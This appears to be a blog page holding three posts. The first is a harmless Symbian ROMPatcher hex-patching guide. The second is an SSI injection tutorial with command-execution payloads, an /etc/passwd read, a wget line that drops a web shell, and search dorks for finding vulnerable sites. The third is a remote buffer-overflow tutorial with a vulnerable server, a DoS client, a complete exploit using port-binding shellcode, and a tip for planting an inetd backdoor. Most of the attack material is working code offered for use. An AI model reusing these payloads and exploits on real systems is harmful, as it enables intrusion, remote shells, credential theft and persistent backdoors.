Chitika

Wednesday, 28 December 2011

How to make rompatcher patches


Make Rompatcher patches:


I just realized that there are only a fraction of the patches which are available for S^3,
Even those patches, most of it are older ones which were initially made for s60v5


So I thought of including this guide which I found in another forum(SF),
The original post was made by the authour "Microx256" on 03 Jul 2008, 03:20
I thought this guide might inspire patch making for S^3,


Also those who wanted to remove red LED in camera, you can try this out:


Contents:


What you need?
How to save Patches as *.rmp
Additional Prefixes
Understanding the HEX
Frequently Asked Questions




Well, you might have found ROMpatcher, and perhaps some good patches for it, but what if you could write your own patches?




What you need?
A HEX editor, i use HxD in this example
A Hacked phone with ROMpatcher installed


So.. Are you ready to begin?


Find out what you want to patch, and where. In my example, i want to change the *#0000# screen to say that i have a Nokia N99.




After looking for the right file to change, i found that its Phone.exe, because it has the path of the file we need to change 


First, open the file in a HEX editor. (I use HxD in my example)
(for understanding what HEX means, theres a short info somewhat down on this post)






Next, I know that Z:\resource\versions\model.txt is the file that shows the Phone model, so i search for it (ctrl + F) also remember to show that we search for text, and that its in Unicode:






Now we have the result, and also see it directly in HEX code, which will be the first part of the HEX code in the patch file:






At this point, its recommended to copy the HEX (circled above) to notepad, or somewhere where you can easily copy it to another place.


Next, i have decided that i want the phone to use Model.txt on the memorycard (E) instead of the Z:\ Drive, so i change the first part of the path (note that changed areas turn red) and you also notice that the HEX code changed from 5A to 45 where i changed the letter Z to be the letter E






At this point, we are half way done, good job if you made it this far.


Next we need to write the patch


The Patch should always have the patch name or short info on the first line, and next comes comments, if you want them, and after that comes the actual Patch, and also, there must be a ; before every line, except the patch line itself, like in this example:


Code:
    ;Model Text Changer
    ;This is a patch that changes the Model text
    ;here i can add as many lines as i want
    ;this was made by Microx256 from SF
    SnR:sys\bin\Phone.exe:5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400:45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400






Now, where did i get that SnR:...blablabla code? Well, you actualy have it already 


First, every patch like this should have a SnR: prefix (SnR means Search and Replace)


And after the SnR: comes the file that we want to change, in this case it was Phone.exe. you need to include there the path to the file, WITHOUT the Z:\ in the beginning, in this case it is sys\bin\Phone.exe
After the path and the file comes a : and after it comes the original, unchanged HEX code that we copied to notepad earlier, and after the original code comesagain a : and after that, finally, the changed code, the code that is still in the hex editor.
Now make sure you copy the same amounth of code that you did earlier (starting from the code of the Z, which is 5A to the 00 after the latest character in the name)


Code:
    First Part: 5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400
    Second Part: 45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400




And there we have a Patch!




Code:
    ;Model Text Changer
    ;This is a patch that changes the Model text
    ;here i can add as many lines as i want
    ;this was made by Microx256 from SF
    SnR:sys\bin\Phone.exe:5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400:45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400






But wait, we are not finished by this patch just yet!


Now, as we changed the Phone.exe to show the file on the memorycard instead of the file on the Z:\, we need to copy and edit the file.


Copy the file Model.txt from Z:\resource\versions\ to E:\resource\versions\ (you might need to make the folders on the memorycard) and edit it as you wish (note: Model.txt has a 20 character limit)


After this, just copy the patch to E:\Patches\ and have fun 








How to save Patches as *.rmp


When having the Code in notepad, you need to save the code, and Notepad saves as .txt by default.
To save it as .rmp, like the patches should be do this:
When saving, Select Save as type: All Files (*.*) and manually add the .rmp extension, for example, here i show how it should be if the Patch name was uberpatch:








Additional Prefixes:


SnR: is not the only prefix, there are some more, for example, the Prefix Rel:


The Prefix Rel: works the same way as SnR, but you define the location info aswell, so the format of the Rel: prefix is:
Rel:Path\file:location:find:replace
Got confused? Let me explain:


Rel: is just like SnR: but different
Path means the same as the path in the SnR: prefix
file is also same as in SnR: Prefix
location this is the difference from the SnR:, this means the location 0x?? of the change, ill explain this later here
find this is the same as in SnR: Prefix, this is what to look for in the file
replace and this is what to replace the previos with, just like in SnR:


Well, whats this all for if it has same effect as SnR?
- if the file have that same code in multiple places, and you want to change just one of them, how would ROMPatcher know what part do you want to change? well, this is the solution to it


And what does that 0x?? mean, and how to find it?
open up HEX editor, in this example i use HxD:


Again, first decide what to do, and where:


In my example, i have decided to remove the Wlan search bar from the Active Standby of my N95.


And i have found out that the file responsible for this is SnifferAIPlugin.dll located in Z:\sys\bin\


And to disable it, i have found out that changing the first and 4th byte to a 00 byte disables it


and well, the bytes are 10 and 79.. but the thing here is that there are those same bytes many many times in the file, but i want to change only the first ones! so i use Rel: prefix..


Heres the bytes im talking about in Blue:






and in the Red circles are the location adresses
so decide which byte you want to know the location,
and take the number from the left vertical column, and add the number from the top horizional colum to it.
For example, the 4th byte would be 00000003 because in the left theres 00000000


and on top theres 03, and 00000000 + 03 is 00000003 
so another example: From the 5th line, the 7th byte would be 00000046 because on the left theres 00000040 and on the top theres 06 


so the patch that changes those 2 bytes marked in blue, would be like this:




Code:
  ;No Wlan in ActiveStandby
    ;This removes the Wlan Search bar from the Active Standby, atleast on nokia N95
    ;to get this to work, first disable ActiveStandby, and then apply the patch, and then again enable Active Standby
    ;By Microx256 from Symbian-Freak.com
    rel:sys\bin\SnifferAIPlugin.dll:00000003:10:00
    rel:sys\bin\SnifferAIPlugin.dll:00000000:79:00


Understanding the HEX:




Well, shortly HEX is actualy just numbers, almost like those that we use :wink:


Here you can see how the most common numeric systems goes:
Decimals - HEX - Binary
0 0 0
1 1 1
2 2 10
3 3 11
4 4 100
5 5 101
6 6 110
7 7 111
8 8 1000
9 9 1001
10 A 1010
11 B 1011
12 C 1100
13 D 1101
14 E 1110
15 F 1111
16 10 10000
17 11 10001
18 12 10010
19 13 10011
20 14 10100
21 15 10101
22 16 10110
23 17 10111
24 18 11000
25 19 11001
26 1A 11010
27 1B 11011
28 1C 11100
29 1D 11101
30 1E 11110
31 1F 11111
32 20 100000
...


Using this online converter, you can convert any hexadecimal to decimal and binary and vice versa 


ok.. maybe thats enough for you to see how they goes :lol:
so basicaly, Decimals, that we use every day, have 10 numbers, 0 1 2 3 4 5 6 7 8 9
and HEX has 16 numbers, 0 1 2 3 4 5 6 7 8 9 A B C D E F
and finally binary has just 2 numbers, 1 and 0 (binary is not needed to know in this tutorial, but it could be usefull to know it)


So, are all those files just numbers? so how can there be text if hex is only numbers?


- yes, they are numbers, and every letter we use, have thier own number :wink:
for example, in HEX editor you can see the letter A (note: its a capital A)


has the HEX of 41
and hex 41 is 65 in Decimal, and 1000001 in Binary 
for this, you can use the Windows calculator, just set it to Scientific from the menus, and then check the Hex button, or Dec (decimal) or Bin (binary) and type a number, and check another button to change it to that 


So, Remember this:
- HEX is "numbers", and every letter and special mark have its own number
- in HEX editor, theres 2 HEX numbers after each other, and they form 1 Byte, and if you converth the 2 hex numbers into Binary, you get 8 Binary numbers, and 1 Binary number is 1 bit (1byte=8bits) and as you might already know, 1 letter takes 1 byte of space, so 2 HEX numbers forms 1 letter 




Frequently Asked Questions:


How did you know what to look for and where?
-> Just keep looking inside files, and you might find something interesting to patch, thats how i did 


My Patch dont show up in ROMpatcher?
-> Make sure the patch is in E:\PAtches\ and that the patch has a .rmp extension


When i try to apply my patch, i get a red cross as an error, why?
-> there can be several reasons, but most probably some of these:
*You are trying to patch a file thats not in the ROM (remember, this is ROM Patcher, not Z Patcher)


EDIT:
By "remember, this is ROM Patcher, not Z Patcher"
He means to say that you can only patch the files in the z:\sys\bin folder of the rom not any file in Z 
If you don't believe this, try to open all thes patches in notepad, and you will see that all of them will have only like this syntax in the last line saying:
SnR:sys\bin\xx(filename)xx:A003A005C(hex code):A003A005C(hex code)
EDIT:
Few more words from the author:
"Remember; this is called ROM Patcher, and not Z Patcher, so basicaly, only files on ROM can be patched.. but for this, there are workarounds, such as, patch the file/application thats pointing to the file and so on.. just like in the tutorial, we patched Phone.exe that points to the model file, but we did not patch the model file (Model.txt) itself, because the model file is not in the ROM..."
EDIT:(explanation by nicesoni_ash)
Quote from: nicesoni_ash on 16 August 2011, 07:47
While using Rompatcher, you must keep in mind that it won't change or edit the contents from Z drive (or say from ROM), however it's only to change the few bytes from these files only when they exist in the memory thus once you restart your phone, these modifications are not there until you reactivate the same patch again or include them in Auto..






*The syntax of the patch is wrong (original code that dont exist)
*The 2 hex codes are not the same lenght
*The lenght of the first and second code must be dividable by 2 (eg. 1337FCA is wrong, because 7 is not dividable by 2, but 1337FCA0 is possible, because 8 is dividable by 2)


How can I know what files are on the ROM and what are not?
-> Use this ROM Dump tool (by Zorn) to get the ROM files extraced to your computer


I did like you did in that example, but the Model line disappeared from the *#0000# display?
-> Make sure the Patch syntax is correct, and also make sure you have your Model.txt in the right directory on the memorycard


Can Patches be harmfull for my phone?
-> Not really, because the Patches dont actualy change anything, and all changes are reset efter you restart your phone. However, if something happens, neither me or Symbian-Freak.com are responsible to any possible harm caused.


Can i Patch many files in 1 Patch?
-> Yes you can, heres a example Patch that changes 2 files in 1 Patch:


Code:
    ;all info mod
    ;this mod lets you change the whole *#0000# screen
    ;make files E:\resource\versions\sw.txt and E:\resource\versions\model.txt on the memorycard
    ;then customize them as you want
    ;there is a 64 character limit for the sw.txt, which is displayed first
    ;and a 20 characters limit for the model.txt, which is displayed after sw.txt
    ;use \n for a new line, also note, the new line uses 2 characters, and there dont need to be a space before or after the marks
    ;also note that the model.txt will be displayed right after sw.txt without a new line, unless you define it so
    ;and you can use the new line marking \n only in sw.txt, it wont work in model.txt
    ;combined mod by Microx256 from SF
    SnR:sys\bin\sysutil.dll:5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C00730077002E0074007800740000001F0000005A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006C0061006E006700730077002E0074007800740000001D0000005A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006C0061006E0067002E007400780074:45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C00730077002E0074007800740000001F00000045003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006C0061006E006700730077002E0074007800740000001D00000043003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006C0061006E0067002E007400780074
    SnR:sys\bin\Phone.exe:5A003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400:45003A005C007200650073006F0075007200630065005C00760065007200730069006F006E0073005C006D006F00640065006C002E00740078007400








If you have guestions, please ask them here and dont PM me, as i am not the author of this thread;
I just decided to share this so that users like you can go ahead and experiment with making patches;




IMPORTANT:


How to open the rom drive?
Two methods
1. Extract the rom drive (open rofs2 in nokia cooker or any program and extract it)


2. Else you can use Rom Dump in Rompatcher plus


How to do this,
Go to rompatcher and under options click on Rom Dump,
You will get a file in the root of your SD card,
Copy paste this file onto your PC,
Then Use CODeRUS RomATv1.8 to extract its contents [RomATv1.8 download here]
Application executable packed by corporate packer. Antiviruses may report this as a threat. Add the executable as an exception!
So dont post about this being virus infected and all crap...its aint a virus designed to screw your pc


There is also option for Superpage Dump,
It will also produce a similar file which can be extracted later

thanx to jnx_r for this awsme tut :)

Monday, 12 December 2011

server side inclusion


Server Side Includes


What is It?


A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what commands could help compromise the server to do this.


What Sites are Vulnerable?


For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes aloud in the config file or the file extention must end in ‘.shtml’ ‘.shtm’ or ‘.stm’ both Apache, lighthttpd and IIS support SSI.


Testing for SSI Injection


To audit a site to check if it is vulnerable to SSI Injection you search all the directories for ‘.shtml’ ‘.shtm’ or ‘.stm’ extentions, if you find any then its probably enabled, if you dont find any it still may be enabled. It effects pages with unsanitized requests, (eg no filters, filtering < !–#exec …–>) To test you enter the following command into the request


< !–#exec cmd=”ls” –>


If you get a filesystem output appear then it is vulnerable, if the server is Windows replace the ‘ls’ for ‘dir’
You test for SSI the same way as XSS, you can post the command into


- Textboxes/search boxes
- Headers
- Cookies
- Address Bar


Useful Commands


Show Files Linux


< !–#exec cmd=”ls” –>


Show Files Windows


< !–#exec cmd=”dir” –>


Read /etc/passwd


<!–#include virtual=”/etc/passwd” –>


What User Is the webserver running on


< !–#exec cmd=”whoami” –>


Download a shell to the server to get full control


< !–#exec cmd=”wget “shell.php”" –>


Dorks


Simillar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection


inurl:index.shtml
inurl:index.shtm
inurl:index.stm


There's many others but you can just use your imagination.


Hope you liked this tutorial.

Server Rooting

This summary is not available. Please click here to view the post.

how to write remote exploit



I hope you’ll enjoy it, ok what are we going to do? We want to exploit a vulnerable server program (vulnerable.c). We want to get a remote shell. In case you are looking for an exercise, read the vulnerable.c program, compile it and try to exploit it. If you don’t have any clue about remote exploits…… well then read further and let us first take a look at the vulnerable program… later we want to look at the functions of the vulnerable program, then how we can abuse an overflow within the program, then we want to define the general structure of the exploit code, and at last we want to write an exploit…



-------------------------------------------- vulnerable.c ----------------------------------------------


#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>


#define BUFFER_SIZE 1024
#define NAME_SIZE 2048

int handling(int c)

{
char buffer[BUFFER_SIZE], name[NAME_SIZE];
int bytes;
strcpy(buffer, "My name is: ");
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
bytes = recv(c, name, sizeof(name), 0);
if (bytes == -1)
return -1;
name[bytes - 1] = ’\0’;
sprintf(buffer, "Hello %s, nice to meet you!\r\n", name);
bytes = send(c, buffer, strlen(buffer), 0);
if (bytes == -1)
return -1;
return 0;

}

int main(int argc, char *argv[])

{
int s, c, cli_size;
struct sockaddr_in srv, cli;
if (argc != 2)
{
fprintf(stderr, "usage: %s port\n", argv[0]);
return 1;
}
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1)
{
perror("socket() failed");
return 2;
}
srv.sin_addr.s_addr = INADDR_ANY;
srv.sin_port = htons( (unsigned short int) atol(argv[1]));
srv.sin_family = AF_INET;
if (bind(s, &srv, sizeof(srv)) == -1)
{
perror("bind() failed");
return 3;
}
if (listen(s, 3) == -1)
{
perror("listen() failed");
return 4;
}
for(;;)
{
c = accept(s, &cli, &cli_size);
if (c == -1)
{
perror("accept() failed");
return 5;
}
printf("client from %s", inet_ntoa(cli.sin_addr));
if (handling(c) == -1)
fprintf(stderr, "%s: handling() failed", argv[0]);
close(c);
}
return 0;

}

---------------------------------------------- EOF------------------------------------------------------

Here’s how you must compile and use the program.

user@linux:~/ > gcc vulnerable.c -o vulnerable

user@linux:~/ > ./vulnerable 8080

./vulnerable 8080 this means, that you run the service on port 8080, look at the port you wanna take, you mustn’t use a privileged port (1 – 1024) assuming you are not root.

Now we’ve compiled the program and we know how to run it.. with the parameter

program <port>

Now we want check some addresses of the program, and take a look on how it is built. We start the vulnerable program with gdb, to look at some things…





now do the following:

user@linux~/ > gdb vulnerable

GNU gdb 4.18

Copyright 1998 Free Software Foundation, Inc.

GDB is free software, covered by the GNU General Public License, and you are

welcome to change it and/or distribute copies of it under certain conditions.

Type "show copying" to see the conditions.

There is absolutely no warranty for GDB. Type "show warranty" for details.

This GDB was configured as "i386-suse-linux"...

(gdb) run 8080

Starting program: /home/user/directory/vulnerable 8080

Now the program is listening for an incoming connection on port 8080.

Next connect with telnet or netcat on port 8080.

user@linux:~/ > telnet localhost 8080

Trying ::1...

telnet: connect to address ::1: Connection refused

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

My name is: Robin

, nice to meet you!

Connection closed by foreign host.

user@linux:~/ >

Now the easy server program doesn’t make anything else then getting a name and writing it back on your screen…. Ok let’s go further…

While you made this, the gdb (debugger) wrote the following on the screen:

client from 127.0.0.1 0xbffff28c

/*Don’t be confused if the address is different on your computer, on my box it is 0xbffff28c */

Ok the server is still running because of the for-loop, so it’s always repeating until you kill the server program.

3. Overflowing the server program

Let's test something....

Now we reconnect to the service on port 8080 and put more than 1024 bytes of characters on the command line "My name is:..."

It should look like this... (I'll take A's *g*)...

user@linux:~/ > telnet localhost 8080

Trying ::1...

telnet: connect to address ::1: Connection refused

Trying 127.0.0.1...

Connected to localhost.

Escape character is '^]'.

My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Now the telnet client should be disconnected... but why? Let's look at the output of gdb:

Program received signal SIGSEGV, Segmentation fault.

0x41414141 in ?? ()

(gdb)

// Don’t close gdb !!

What happened? As we can see, the eip is set to 0x41414141, probably you are asking why?

OK, I’ll try to explain it. 0x41 stands for an ‘A’... as we put over 1024 bytes in, the program has tried to copy the string name[2048] into

buffer[1024].... so because the string in name[2048] was greater than 1024 bytes, the name buffer has overwritten the buffer

and also overwritten the saved eip (extended instruction pointer, here is the returnaddress stored).. so our buffer

looks like this:

[xxxxxxxx-name-2048-bytes-xxxxxxxxxx]

[xxxxx buffer-only-1024-bytes xxx] [EIP]

Ok our stack should look like this. We’ve tried to put more than 1024 byte into buffer, and then we’ve overwritten the eip *g*.

// don't forget .. eip has a size of 4 bytes !



After you overwrote the whole returnaddress, the function wanted to return to the main function, it jumped to the

wrong address (0x41414141) .... and so there was a segmentation fault.

Now here's a DoS tool for this program:

------------------------------------- dos.c ------------------------------------------------------------

#include <stdio.h>

#include <netinet/in.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netdb.h>

int main(int argc, char **argv)

{

struct sockaddr_in addr;

struct hostent *host;

char buffer[2048];

int s, i;

if(argc != 3)

{

fprintf(stderr, "usage: %s <host> <port>\n", argv[0]);

exit(0);

}

s = socket(AF_INET, SOCK_STREAM, 0);

if(s == -1)

{

perror("socket() failed\n");

exit(0);

}

host = gethostbyname(argv[1]);

if( host == NULL)

{

herror("gethostbyname() failed");

exit(0);

}

addr.sin_addr = *(struct in_addr*)host->h_addr;

addr.sin_family = AF_INET;

addr.sin_port = htons(atol(argv[2]));



if(connect(s, &addr, sizeof(addr)) == -1)

{

perror("couldn't connect so server\n");

exit(0);

}

/* Not difficult only filling buffer with A’s.... den sending nothing more */

for(i = 0; i < 2048 ; i++)

buffer[i] = 'A';

printf("buffer is: %s\n", buffer);

printf("buffer filled... now sending buffer\n");

send(s, buffer, strlen(buffer), 0);

printf("buffer sent.\n");

close(s);

return 0;

}

--------------------------------------------- EOF ------------------------------------------------------











4. Finding the return address



I only want to show you how the structure is of an remote exploit looks like, so let's find out what we are going to do:

First we open gdb and search for the esp... to find esp you can put in the gdb.. (I hope you didn't close gdb) after getting a SEGFAULT... ok now type this x/200bx $esp-200 in, so you should get an ouput of addresses... It should look like this :

(gdb) x/200bx $esp-200

0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41

---Type <return> to continue, or q <return> to quit---

Ok know we know that we've overwritten the whole buffer, so let's take one of those addresses... I'll show you later

why this... (because we want to guess the address), maybe you know the NOP's technique... so it shouldn't be any problem to

make our exploit working as well.... or to make our chance bigger to guess the return-address.

Attention don’t take the nearest address near the end of the 0x41, take an address which is in the middle, we’ll overwrite it later with NOPs.



5. Structure of the exploit code

So we've got a possible return address, let's try to use it... the exploit code should be structured like this:

1. First let's find out the esp.. ok we've got it. (ok we've got an address near the esp, that isn't any problem, because we’ll fill the buffer with NOP's)... then you should find a good shellcode which binds a shell on a port... Don't forget: in remote exploits we can't use local exploit shellcodes.. ok we could, but it isn’t very clever. So we have to find another way to get a shell. What about a portbinder shellcode, which binds a shell on a port ??

Ok in the net are many of these portbinder shellcodes .. i.e. www.hack.co.za or my page *g*.

2. Declaring a buffer which is bigger than 1024 bytes... let's make it 1064 bytes, so there is no problem to overwrite eip.. so don't forget you only have to declare a buffer which is greater than 1024 bytes...

3. Let's prepare the buffer. Now let's first fill the whole buffer with NOP's:

memset(buffer, 0x90, 1064);



4. Let's copy the shellcode into the buffer

memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode));

Here we put the shellcode in the middle of the buffer

Why? Ok, if we got enough NOPS at the beginnig, our chance is getting better to execute the shellcode

5. Let's terminate the Nullbyte in the buffer

buffer[1000] = 0x90; // 0x90 is the NOP in hexadecimal

6. Let's copy the returnaddress at the end of the buffer

for(i = 1022; i < 1059; i+=4)

{

((int *) &buffer[i]) = RET;

// RET is the returnaddress we want to use... #define in the header

}

We know that the buffer ends by 1024 bytes, but to get sure we begin on 1022, then we’re copying the returnaddress until we’ve got 1059 bytes.. that is enough because we've already overwritten the eip (we hope so *g*).

7. Let's add a \0 Nullbyte at the end of our prepared buffer:

buffer[1063] = 0x0;

Now we've prepared our buffer, now we only need to send it to the vulnerable host.. by port and host or ip.

-------------------------------------------- exploit.c --------------------------------------------------

/* Simple remote exploit, which binds a shell on port 3789

* by triton

*

* After return address was overwritten, you can connect

* with telnet or netcat to the victim host on Port 3789

* After you logged in... there’s nothing, but try to enter "id;" (don’t forget the semicolon)

* So you should get an output, ok you’ve got a shell *g*. Always use:

*

* <command>;

*

* execute.

*/

#include <stdio.h>

#include <netdb.h>

#include <netinet/in.h>

//Portbinding Shellcode

char shellcode[] =

"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"

"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"

"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"

"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"

"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"

"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"

"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"

"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

//standard offset (probably must be modified)

#define RET 0xbffff5ec



int main(int argc, char *argv[]) {

char buffer[1064];

int s, i, size;

struct sockaddr_in remote;

struct hostent *host;

if(argc != 3) {

printf("Usage: %s target-ip port\n", argv[0]);

return -1;

}

// filling buffer with NOPs

memset(buffer, 0x90, 1064);

//copying shellcode into buffer

memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));

// the previous statement causes a unintential Nullbyte at buffer[1000]

buffer[1000] = 0x90;

// Copying the return address multiple times at the end of the buffer...

for(i=1022; i < 1059; i+=4) {

* ((int *) &buffer[i]) = RET;

}

buffer[1063] = 0x0;

//getting hostname

host=gethostbyname(argv[1]);

if (host==NULL)

{

fprintf(stderr, "Unknown Host %s\n",argv[1]);

return -1;

}

// creating socket...

s = socket(AF_INET, SOCK_STREAM, 0);

if (s < 0)

{

fprintf(stderr, "Error: Socket\n");

return -1;

}

//state Protocolfamily , then converting the hostname or IP address, and getting port number

remote.sin_family = AF_INET;

remote.sin_addr = *((struct in_addr *)host->h_addr);

remote.sin_port = htons(atoi(argv[2]));

// connecting with destination host

if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)

{

close(s);

fprintf(stderr, "Error: connect\n");

return -1;

}

//sending exploit string

size = send(s, buffer, sizeof(buffer), 0);

if (size==-1)

{

close(s);

fprintf(stderr, "sending data failed\n");

return -1;

}

// closing socket

close(s);

}

--------------------------------------------- EOF-------------------------------------------------------

7. Using the exploit

user@linux~/ > gcc exploit.c –o exploit

user@linux~/ > ./exploit <host> <port>

Now it should work If you got the right return address... or one of the right return addresses.

user@linux~/ > telnet <host> 3879

If you’re connected then try to do this:

id;

uid=500(user) gid=500(user) groups=500(user)

As you can see, it works very well.





8. Getting root privileges

Do the following:

user@linux~/ > su

password: ******

root@linux~/ > ls –ln vulnerable

-rwxrwxr-x 1 500 500 14106 Jun 18 14:12 vulnerable

root@linux~/ > chown root vulnerable

root@linux~/ > chmod 6755 vulnerable

root@linux~/ > ./vulnerable <port>

Now you can exploit the server program, and you should get a root shell *g*

9. Enter the service in inetd.conf

Ok we’re interested how the program, would work, if it would be a deamon. Now do the following:

First copy the vulnerable pogram to /usr/bin/

root@linux~/ > cp vulnerable /usr/bin/vulnerable

Now let’s modify some files...

root@linux~/ > vi /etc/services

(Feel free to use your favourite editor instead of vi)

Define a port which you wanna take. I’ll take the port 1526, now let’s enter this informations into /etc/services

vulnerable 1526/tcp # defining port for our server program, save and quit

Now edit the inetd.conf file

root@linux~/ > vi /etc/inetd.conf

put in:

vulnerable stream tcp nowait root /usr/bin/vulnerable vulnerable 1526

Now safe the inetd.conf file and quit.

root@linux~/ > killall –HUP inetd

Now restart inetd and everything should work..

Note: This is also a good way to make a backdoor, adding a service in /etc/services then, add the things in inetd.conf and right /bin/sh sh –i or sh –h *g*....

9. Problem solutions

If the exploit doesn’t work, please think about the return address, it could be wrong, test it with gdb....

user@linux~/ > gdb vulnerable

.....

(gdb) run <port>

Now you can exploit the program, if it doesn’t work look at the output of gdb, and try to find out the address